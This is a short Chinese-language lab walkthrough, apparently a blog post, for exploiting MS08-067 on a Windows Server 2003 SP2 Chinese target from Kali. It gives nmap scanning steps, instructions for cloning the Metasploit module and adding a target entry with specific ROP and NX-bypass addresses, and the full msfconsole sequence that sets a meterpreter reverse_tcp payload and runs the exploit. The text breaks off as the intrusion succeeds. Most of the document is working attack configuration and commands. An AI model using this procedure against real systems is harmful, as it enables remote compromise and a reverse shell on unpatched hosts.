攻击机:kail —— IP:192.168.74.132

目标靶机:win2003 sp2 中文版系统—— IP:192.168.74.128

 

一、扫描漏洞

1. 在kail中运行 namp 192.168.74.128 ,查看目标主机开放的端口号并选取要攻击的端口号

 2. 由于是中文版系统所以需要添加模块

(1)进入目录: cd  /usr/share/metasploit-framework/modules/exploits/windows/smb

(2)备份文件: cp  ms08_067_netapi.rb ms08_067_netapi_ser2003_zh.rb

(3)列出文件: ls

 

 (4)编辑文件: vim  ms08_067_netapi_ser2003_zh.rb

 (5)添加以下内容:

['Windows 2003 SP2 Chinese (NX)',

           {

             'RetDec'    => 0x7c99beb8,  # dec ESI, ret @NTDLL.DLL (0x4EC3)

             'RetPop'    => 0x7cb5e84e,  # push ESI, pop EBP, ret @SHELL32.DLL(0x565DC3)

             'JmpESP'    => 0x7c99a01b,  # jmp ESP @NTDLL.DLL(0xFFE4)

             'DisableNX' => 0x7c96f517,  # NX disable @NTDLL.DLL

             'Scratch'   => 0x00020408,

           }

          ],

 3. 进入攻击阶段

(1)进入msfconsole模式

 (2)查找漏洞: search ms08_067   (或者使用show exploits 列出所有漏洞)

 (3)使用漏洞: use exploit/windows/smb/ms08_067_netapi_ser2003_zh

 (4)查看详情: info   (记住下图所圈的id号,后边会用到,具体的id号是多少根据自己的实际情况而定)

 (5)设置监听主机: set LHOST 192.168.74.132   (kail的IP)

 (6)设置目标主机: set RHOST 192.168.74.128   (靶机的IP)

 (7)设置攻击方式: set payload windows/meterpreter/reverse_tcp

 (8)查看详情: show options

 (9)设置目标id: set  target  12

 (10)查看详情:  show  options

 

 (11)攻击: exploit

 

 (12)入侵成功,出现乱码,在kail终端设置